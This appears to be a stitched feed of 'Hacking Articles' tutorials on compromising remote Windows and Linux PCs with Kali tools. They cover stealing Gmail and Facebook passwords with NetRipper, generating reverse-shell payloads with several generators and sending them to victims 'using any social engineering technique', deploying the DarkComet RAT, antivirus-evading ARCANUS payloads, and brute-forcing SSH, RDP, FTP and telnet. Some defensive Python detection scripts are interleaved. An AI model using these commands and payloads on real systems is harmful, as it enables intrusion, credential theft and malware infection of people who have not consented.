Channel: Kali Linux Archives - Hacking Articles

Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool


NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

Open your Kali Linux terminal and type the following command

git clone https://github.com/NytroRST/NetRipper.git

Now install NetRipper in Kali Linux; the step-by-step process is given below.

  • cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
  • mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  • g++ -Wall netripper.cpp -o netripper
  • cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  • cd ../Release
  • cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Now Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

 Now bypass the UAC visit

 http://www.hackingarticles.in/bypass-uac-protection-of-remote-windows-pc-in-memory-injection/

Now search netripper

type use post/windows/gather/netripper

msf exploit (netripper)>set verbose true

msf exploit (netripper)>set processnames firefox.exe

msf exploit (netripper)>set session 2

msf exploit (netripper)>exploit

Now it will automatically create a NetRipper folder on the target PC at the following location

C:\Users\RAJ\AppData\Local\Temp\NetRipper

You have access to the victim’s PC. Use “sessions” and the session number to connect to the session. Now type “sessions -i ID” and then type shell to get the command prompt of the victim PC.

The captured data is saved by default in TEMP (e.g. C:\Users\RAJ\AppData\Local\Temp\NetRipper).

Now go to the above path by using the command.

C:\windows\system32>cd  C:\Users\RAJ\AppData\Local\Temp\NetRipper

Now type Dir command and it will show the list of text files.

In our example, the output file named 1004_firefox.exe_PR_Write.txt may contain the password.

We can read that text file from command line using type command.

type 1004_firefox.exe_PR_Write.txt

Now press Ctrl+Shift+F to open the find box and type &pass.

Now you can find the password of gmail or facebook as shown below.

The post Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool appeared first on Hacking Articles.


Hack Remote PC with Nettool MitM Pentesting Toolkit


netool.sh is a bash script that automates frameworks like Metasploit, Nmap, Driftnet, SSLstrip and Ettercap MITM attacks. It retrieves metadata and the geo-location of the target, and has the ability to capture SSL passwords under MITM, sniff URLs accessed by the target machine, change hostname, change IP and MAC address to decoy scans, capture pictures of web-browser surfing (driftnet), perform TCP/UDP packet manipulation using etter.filters, run DoS attacks on local/external networks, and run a webcrawler.

Open your kali Linux terminal and type the following command

 git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali

Now a pop up will open click on yes

Again a pop up will open click on yes

Open terminal and type ./netool.sh and press enter to continue

Now it will ask you for your choice press 8 now a pop up will open click on yes

You can see lots of attacking option choose 21 Windows.exe payloads

Now a pop up will open Enter IP address of your kali Linux pc And click OK.

Now it will ask for port no. Enter the port no.  Such as 4567 and click OK.

Entering the payload name and click OK

Now it will show the path where payload will be stored and ask how to deliver, choose multi-handler. Click OK.

Now select the default listener option and click OK

Now it will execute TCP handler on 192.168.0.103 and start the payload handler.

Now it will show a file with the name soft.exe. Send the exe file to the victim using any social engineering technique.

When the victim runs the exe, you will get a meterpreter session on the victim PC.

Denial of Service Attack on Network PC using SET Toolkit

First open the Kali Linux applications tab, go to Exploitation Tools and then choose SET Toolkit

Now press enter

Now choose option 2, “Fast-Track Penetration Testing” and enter

Then choose option 2, “Custom Exploits” and Enter

After that choose option 4, “RDP use after free –Denial of Service” and Enter

Now enter the IP address of the remote PC you want to crash

Exploit Remote Windows PC using ps1encodeTool

Used to generate and encode PowerShell-based Metasploit payloads.

 Available output types:

  • raw (encoded payload only – no powershell run options)
  • cmd (for use with bat files)
  • vba (for use with macro trojan docs)
  • vbs (for use with vbs scripts)
  • war (tomcat)
  • exe (executable) requires MinGW – i586-mingw32msvc-gcc [apt-get install mingw32]
  • java (for use with malicious java applets)
  • js (javascript)
  • php (for use with php pages)
  • hta (HTML applications)
  • cfm (for use with Adobe ColdFusion)
  • aspx (for use with Microsoft ASP.NET)
  • lnk (windows shortcut – requires a website to stage the payload)

Open your kali Linux terminal and type the following command

git clone https://github.com/CroweCybersecurity/ps1encode.git

./ps1encode.rb -i 192.168.0.140 -p 4567 -a windows/meterpreter/reverse_https -t cmd

raw =>  base64 powershell code only without the run options
cmd =>  default payload – use with bat files or for an easy copy + paste + shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that will call out powershell and inject code into it. Requires MinGW to compile
java => for use with java applet attacks (details on this and the setup instructions later)
php =>  for use with PHP sites – an alternative to using web shells
hta => HTML Applications –  good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion. Similar to PHP, this is an alternative to using a web shell

Copy the highlighted text shown in the window below, save it in bat format and send it to the victim

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.140

exploit

Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Find the Vulnerable Router on Internet using RouterhunterBR

The RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet, looking at defined IP ranges or random ones, in order to automatically exploit the DNSChanger vulnerability on home routers.

The script explores four vulnerabilities in routers

01 – Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35995/

02 – D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35917/

03 – LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit

reference: http://www.exploit-db.com/exploits/36014/

04 – D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit

reference: http://1337day.com/exploit/23302/

Open your kali Linux terminal and type the following command

https://github.com/googleinurl/RouterHunterBR.git

./routerhunter.py  –range ‘182.75.*.*’ –dns1  8.8.8.8 –dns2 8.8.4.8

Legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Exploit Remote Windows PC using HTA Attack with Net Tools

Open your Kali Linux terminal and type the following command

git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali

Open terminal and type ./netool.sh and press enter to continue

Now it will ask you for your choice press 8 now a pop up will open click on yes

You can see lots of attacking option choose 4 Powershell (Relik)

Now a pop up will open choose a powershell payload (powershell.hta) then click OK.

Again a pop up will open. Enter the IP address of your Kali Linux PC and click OK.

Now it will ask for port no. Enter the port no.  Such as 4444 and click OK.

Enter the target IP address and press Enter.

Click on yes to start a listener.

Now it will execute TCP handler on 192.168.0.103 and start the payload handler.

When the victim machine browses to your link, it will download the launcher.hta file; when the victim clicks on it, you will get the meterpreter session.

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt

Hack Remote PC using Darkcomet RAT with Metasploit

Download DarkcometRAT From here after downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe”

First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)

In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist

In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal

Now save it on your desktop.

Again open DARKCOMET RAT and select listen to new port option

Now enter the port number used in the form above and click on Listen

Now hack victim’s PC using Metasploit How to Hack Remote PC

Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet

upload /root/Desktop/updates.exe d:\\

Now type shell to get the command prompt of victim’s PC. And run uploaded exe file

Now you can get the session of victim’s PC. See the screenshot below:

Click on system info you can see the whole system information of victim’s PC

Hack Remote Windows 10 PC using psmsf

PSMSF can help us generate payloads or files used in cmd console/browser/.. with Metasploit-Framework. If you are familiar with the Windows cmd console, you can use the results in different areas.

Open your kali Linux terminal and type the following command

git clone https://github.com/all3g/psmsf.git

Now type following command to create payload

python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.0.140 --lport 4444

Now it will show two files named powershell_hacking.bat and powershell_msf.rc. Send the bat file to the victim using any social engineering technique.

Start a Metasploit Framework listener: type msfconsole -r powershell_msf.rc

When the victim runs the bat file, you will get a meterpreter session on the victim PC.

Exploit Remote Windows PC using PSploitGen

This python script generates metasploit shellcode payloads in Windows batch file format, powershell script format, and MS-Office visual basic macro format. The default metasploit payloads are:

  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp

If TCP port 443 is specified, the script will automatically generate an HTTPS payload also using ‘windows/meterpreter/reverse_https’. The script will accept multiple TCP ports, which are comma-delimited.

Open your kali Linux terminal and type the following command

git clone https://bitbucket.org/jsthyer/psploitgen.git

Now type following command to create payload

./psploitgen.py --lhost 192.168.0.140 --lport 4444 --payload windows/x64/meterpreter/reverse_tcp

Now it will show a file with the extension .bat. Send the bat file to the victim using any social engineering technique

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.
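From the defender's side, the ps1encode, psmsf and PSploitGen posts above all end in a batch file or command line that hands an encoded script to PowerShell. The following is an added example, not code from the original posts or from those tools: it assumes the wrapper uses PowerShell's `-EncodedCommand` switch (Base64 of UTF-16LE text), and the function names, indicator list and sample batch content are constructed for illustration.

```python
import base64

# Switch names powershell.exe accepts by unambiguous prefix, plus short aliases.
SWITCHES = ("encodedcommand", "windowstyle", "noprofile",
            "noninteractive", "executionpolicy")
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand",
           "ep": "executionpolicy", "w": "windowstyle"}
# Strings worth a second look inside a decoded script (a starting list only).
INDICATORS = ("frombase64string", "invoke-expression", "iex ",
              "downloadstring", "virtualalloc")


def resolve(flag):
    """Map 'nop', 'W', 'enc' ... to the full switch name, or None."""
    flag = flag.lower()
    if flag in ALIASES:
        return ALIASES[flag]
    hits = [name for name in SWITCHES if name.startswith(flag)]
    return hits[0] if len(hits) == 1 else None


def decode_payload(b64):
    """-EncodedCommand carries Base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # malformed Base64 or not UTF-16LE
        return None


def find_encoded_commands(text):
    """Return one finding per line that runs PowerShell with an encoded script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        tokens = line.split()
        names = [t.strip('"').lower().rsplit("\\", 1)[-1] for t in tokens]
        start = next((i for i, n in enumerate(names)
                      if n in ("powershell", "powershell.exe")), None)
        if start is None:
            continue
        switches, payload = set(), None
        args = tokens[start + 1:]
        for i, tok in enumerate(args):
            if not tok.startswith("-"):
                continue
            name = resolve(tok[1:])
            value = args[i + 1].strip('"') if i + 1 < len(args) else ""
            if name == "encodedcommand":
                payload = value
            elif name == "windowstyle" and value.lower() == "hidden":
                switches.add("hidden-window")
            elif name == "executionpolicy" and value.lower() in ("bypass", "unrestricted"):
                switches.add("execution-policy-bypass")
            elif name == "noprofile":
                switches.add("no-profile")
            elif name == "noninteractive":
                switches.add("non-interactive")
        if payload is None:
            continue
        decoded = decode_payload(payload)
        lowered = (decoded or "").lower()
        findings.append({
            "line": lineno,
            "switches": sorted(switches),
            "decoded": decoded,  # None means the argument did not decode
            "indicators": [s.strip() for s in INDICATORS if s in lowered],
        })
    return findings


def _enc(script):
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample batch file; the encoded scripts are harmless.
SAMPLE_BAT = "\n".join([
    "@echo off",
    "powershell.exe -NoP -NonI -W Hidden -Enc "
    + _enc("Write-Output 'constructed benign sample'"),
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "cmd.exe /c powershell -e "
    + _enc("$b=[Convert]::FromBase64String('QUJD'); $b.Length"),
])

if __name__ == "__main__":
    for finding in find_encoded_commands(SAMPLE_BAT):
        print(finding)
```

The same function can be run over process-creation command lines exported from endpoint logging, one command line per input line.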

4 Ways to Hack SSH Service on Remote PC

SSH Login Check Scanner

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/ssh/ssh_login

msf exploit (ssh_login)>set userpass_file /usr/share/msf/data/wordlist/root_pass.txt

msf exploit (ssh_login)>set rhosts 192.168.0.103 (IP of Remote Host)

msf exploit (ssh_login)>set verbose true

msf exploit (ssh_login)>exploit

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

 Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l root -P /root/Desktop/pass.txt 192.168.0.103 ssh

  • -l indicates a single username (use -L for a username list)
  • -P indicates use the following password list
  • ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra cracks the password

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.103

Protocol: ssh

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

 Run the following command

ncrack --user root -P /root/Desktop/pass.txt 192.168.0.103:22

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.
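All four tools in this post produce the same trace on the target: a run of failed password attempts from one source, sometimes ending in a successful login. The following is an added example, not part of the original post, that detects that pattern in OpenSSH authentication log lines; the log lines, the threshold and the function name are constructed for illustration, and the syslog year is passed in because the log format omits it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format (not taken from the post).
SAMPLE_AUTH_LOG = """\
Mar 10 10:00:01 server sshd[2101]: Failed password for root from 192.168.0.140 port 40112 ssh2
Mar 10 10:00:02 server sshd[2103]: Failed password for root from 192.168.0.140 port 40114 ssh2
Mar 10 10:00:03 server sshd[2105]: Failed password for invalid user admin from 192.168.0.140 port 40116 ssh2
Mar 10 10:00:04 server sshd[2107]: Failed password for alice from 192.168.0.55 port 51200 ssh2
Mar 10 10:00:05 server sshd[2109]: Failed password for root from 192.168.0.140 port 40118 ssh2
Mar 10 10:00:06 server sshd[2111]: Failed password for root from 192.168.0.140 port 40120 ssh2
Mar 10 10:00:07 server sshd[2113]: Failed password for root from 192.168.0.140 port 40122 ssh2
Mar 10 10:00:09 server sshd[2115]: Accepted password for root from 192.168.0.140 port 40124 ssh2
Mar 10 10:00:20 server sshd[2117]: Accepted password for alice from 192.168.0.55 port 51202 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def detect_dictionary_attacks(log_text, threshold=5,
                              window=timedelta(seconds=60), year=2016):
    """Flag sources with >= threshold failed logins inside a sliding window.

    Returns {source_ip: {"max_failures", "users", "login_after_burst"}}.
    "login_after_burst" names the account that logged in from the same
    source while the burst was still inside the window, which is the case
    that needs immediate response (password reset, session review).
    """
    recent = defaultdict(deque)  # source IP -> (time, user) of recent failures
    findings = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if m is None:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src, user = m["src"], m["user"]
        failures = recent[src]
        # Drop failures that have aged out of the window.
        while failures and when - failures[0][0] > window:
            failures.popleft()
        if m["kind"] == "Failed":
            failures.append((when, user))
            if len(failures) >= threshold:
                hit = findings.setdefault(
                    src, {"max_failures": 0, "users": set(),
                          "login_after_burst": None})
                hit["max_failures"] = max(hit["max_failures"], len(failures))
                hit["users"].update(u for _, u in failures)
        elif src in findings and len(failures) >= threshold:
            findings[src]["login_after_burst"] = user
    return findings


if __name__ == "__main__":
    for src, hit in detect_dictionary_attacks(SAMPLE_AUTH_LOG).items():
        print(src, hit)
```

A single mistyped password followed by a good login, like the 192.168.0.55 lines in the sample, stays below the threshold and is not reported.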

Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

 So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning.

Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

  • Open: This indicates that an application is listening for connections on this port.

  • Closed: This indicates that the probes were received but there is no application listening on this port.
  • Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
  • Unfiltered: This indicates that the probes were received but a state could not be established.
  • Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.
  • Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.
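The port states above are what an administrator acts on when scanning their own network. The following is an added example, not part of the original guide: it parses Nmap's grepable output (the `-oG` option, which the guide does not use) and compares each host's ports with an allowlist of expected services. The scan output and the allowlist are constructed, and Nmap writes the combined states as `open|filtered` and `closed|filtered`.

```python
# Constructed sample laid out like Nmap's grepable (-oG) output.
SAMPLE_GNMAP = "\n".join([
    "# constructed sample, not real scan output",
    "Host: 192.168.0.102 ()\tStatus: Up",
    "Host: 192.168.0.102 ()\tPorts: 22/open/tcp//ssh///, 23/open/tcp//telnet///, "
    "3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (997)",
    "Host: 192.168.0.113 ()\tStatus: Up",
    "Host: 192.168.0.113 ()\tPorts: 80/open/tcp//http///, "
    "161/open|filtered/udp//snmp///",
])

# Hypothetical allowlist: services each host is supposed to expose.
ALLOWED = {
    "192.168.0.102": {(22, "tcp")},
    "192.168.0.113": {(80, "tcp")},
}

UNDETERMINED = {"open|filtered", "unfiltered"}


def parse_grepable(text):
    """Return {host: [(port, proto, state, service), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comments and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # port/state/protocol/owner/service/rpcinfo/version/
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                hosts.setdefault(host, []).append(
                    (int(port), proto, state, service))
    return hosts


def audit(hosts, allowed):
    """List ports whose state needs attention, relative to the allowlist."""
    findings = []
    for host, ports in sorted(hosts.items()):
        expected = allowed.get(host, set())
        for port, proto, state, service in sorted(ports):
            key = (port, proto)
            if state == "open" and key not in expected:
                findings.append((host, port, proto, service,
                                 "unexpected open port"))
            elif state in UNDETERMINED:
                findings.append((host, port, proto, service,
                                 "state undetermined, rescan"))
            elif state in ("closed", "filtered") and key in expected:
                findings.append((host, port, proto, service,
                                 "expected service not reachable"))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_grepable(SAMPLE_GNMAP), ALLOWED):
        print(*finding)
```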

Open the Kali Linux terminal and type nmap to see all nmap commands

 Find All Connected PC (Ping Scan)

 The -sP option performs a ping-only scan. It is most useful when you have a group of IP addresses and you don’t know which ones are reachable.

 nmap -sP -T4 192.168.0.1/24

 Note:

-T : Used to change the speed of the scan. A slow scan yields better results

Multiple IP Scan

 nmap -sn 192.168.0.1/24

TCP Ports Scan

 TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports in Remote PC.

Single IP Scan

nmap -sT 192.168.0.102

Multiple IP Scan

 nmap -sT 192.168.0.1/24

Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102

Multiple Hosts Scanning

 nmap -sV -T4 192.168.0.1/24

Detect Operating System

In this scan you can find the Installed Operating System in the Network PC.

 Single Host Scanning

 nmap -O 192.168.0.102

Multiple Hosts Scanning

 nmap -O -T4 192.168.0.1/24

Detect Protocol

In this scan you can find the PROTOCOL, STATE, SERVICE in the Network PC.

nmap -sO -T4 192.168.0.1/24

 

Aggressive Scan (Also Work for Trace route)

 For Single Host

The aggressive scan selects the most commonly used options; it is a simple alternative to writing long strings of options. It will also work for traceroute, etc.

nmap -A 192.168.0.102

Multiple Hosts Scanning

 nmap -A -T4 192.168.0.1/24

UDP Ping Scan

This scan sends UDP probes to the target. It will show you all open UDP ports in Remote PC.

 nmap -sU -T4 192.168.0.102

Syn Scan

Completes 2 steps of the 3-way handshake. No chance of closing or crashing target. Undetected by older systems. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap -sS 192.168.0.113

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

2 Ways to Hack Remote Desktop Password using kali Linux

Remote Desktop run on port 3389 so in order to discover information regarding the RDP we need to execute the following script:

nmap -sV 192.168.0.100

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.100

Protocol: rdp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your Passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Open kali linux terminal Run the following command

 hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

  • -l indicates a single username (use -L for a username list)
  • -P indicates use the following password list
  • ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra cracks the password

To connect to victim using remote desktop, we can use rdesktop program

rdesktop -u <username> -p <password> <ip-address-target>

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

5 Ways to Hack FTP Service on Remote PC

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (ftp_login)>set rhosts 192.168.1.35 (IP of Remote Host)

msf exploit (ftp_login)>set verbose true

msf exploit (ftp_login)> exploit

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.1.35

Protocol: ftp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l msfadmin -P /root/Desktop/pass.txt 192.168.1.35 ftp

  • -l indicates a single username (use -L for a username list)
  • -P indicates use the following password list
  • ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra cracks the password

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack --user msfadmin -P /root/Desktop/pass.txt 192.168.1.35:21

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

medusa -h 192.168.1.35 -u msfadmin -P /root/Desktop/pass.txt -M ftp

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

Hack Remote Linux PC using PHP File

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in the window below and send it to the victim

When the victim pastes the highlighted text in a terminal and runs it, you get full access to the victim system

Hack Remote Windows 10 PC using Discover Tool

Open your kali Linux terminal and type the following command

git clone https://github.com/leebaird/discover.git

 Open terminal and type ./discover.sh and press enter to continue

Now it will show you various options of tools with target OS and format. In my case I am selecting option 13 and press enter

Again it will show you various options payloads. In my case I am selecting option 6 and press enter

Enter IP address of your kali linux pc. And click OK.

Now it will ask for port no. Enter the port no.  Such as 4444 and click OK.

Now it will store a file with name payload-windows-x86_64.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.22

exploit

Now send your EXE files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.



3 Ways to Hack Telnet Password of Remote PC


This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/telnet/telnet_login

msf exploit (telnet_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (telnet_login)>set rhosts 192.168.0.131 (IP of Remote Host)

msf exploit (telnet_login)>set verbose true

msf exploit (telnet_login)> exploit

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l msfadmin -P /root/Desktop/pass.txt 192.168.0.131 telnet

  • -l indicates a single username (use -L for a username list)
  • -P indicates use the following password list
  • ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra cracks the password

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

medusa -h 192.168.1.35 -u msfadmin -P /root/Desktop/pass.txt -M telnet

Now connect to the victim PC using the telnet command; the result is shown below.

telnet 192.168.0.131

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

Web Hacking Lab Setup using DVNA in Kali Linux

Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It’s loaded with common web vulnerabilities and various levels of complexity.

Open your kali Linux terminal and type the following command

sudo apt-get install git

Now type

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

 source ~/.bashrc

Next type

nvm install 5.3.0

nvm use 5.3.0

git clone https://github.com/quantumfoam/DVNA.git

cd DVNA/

npm set progress=false

In next step type

npm install

Now type

node dvna.js

Navigate to http://localhost:3000/

Exploit Windows 10 PC using msfven.sh Script

Open your kali Linux terminal and type the following command

git clone https://github.com/wayneaswilliams/msfvenom_custom_encoding.git

Now type following command to create payload

./msfven.sh

 Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4445 and press enter

In next step use payloads e.g. windows/meterpreter/reverse_tcp and press enter

Now it will show a file with name tcp_445.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

 Now send your exe files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus)

ARCANUS is a customized payload generator/handler for penetration testing only

WHY USE ARCANUS ?

  • In the pen-test world Metasploit is the mainstream for this job, but ARCANUS has a few advantages.
  • ARCANUS generates a unique payload for windows and linux systems that can’t be detected with any antivirus programs. (Don’t give any samples to Virus Total or similar web sites to keep it that way ;D )
  • It has extra modules for exploitation. Ordinary reverse shell payloads offer only remote access to command prompts, but ARCANUS has a few special commands like “£persistence, £download, £upload, £meterpreter…”
  • It is silent and continuous. Metasploit payloads attempt to connect to the remote host just once, but when you execute ARCANUS payloads they make connection attempts every 5 seconds silently in the background.
  • It is flexible. If you want to use it with Metasploit, it has a meterpreter module for executing meterpreter shellcodes on the remote machine.
  • Platform independent ! ARCANUS works both on windows and linux.

Open your kali Linux terminal and type the following command

git clone https://github.com/EgeBalci/ARCANUS.git

Open terminal and type ./ARCANUS and press enter to continue

Now it will ask you for your choice press 2 now a pop up will open click on enter

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4444 and press enter

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Go to https://www.virustotal.com/en

Click the “Choose File” button. Navigate to and double-click payload.exe. It appears in the “Choose File” box, as shown below:

Now when the victim opens payload.exe you can access the Windows command prompt. Running SystemInfo in the prompt will tell you all you need to know about your computer system

When we need to retrieve a file from the target we use the download command

£download “Filename” /root/Your Path

For More Command visit here

Exploit Web Server using WordPress WPTouch Authenticated File Upload

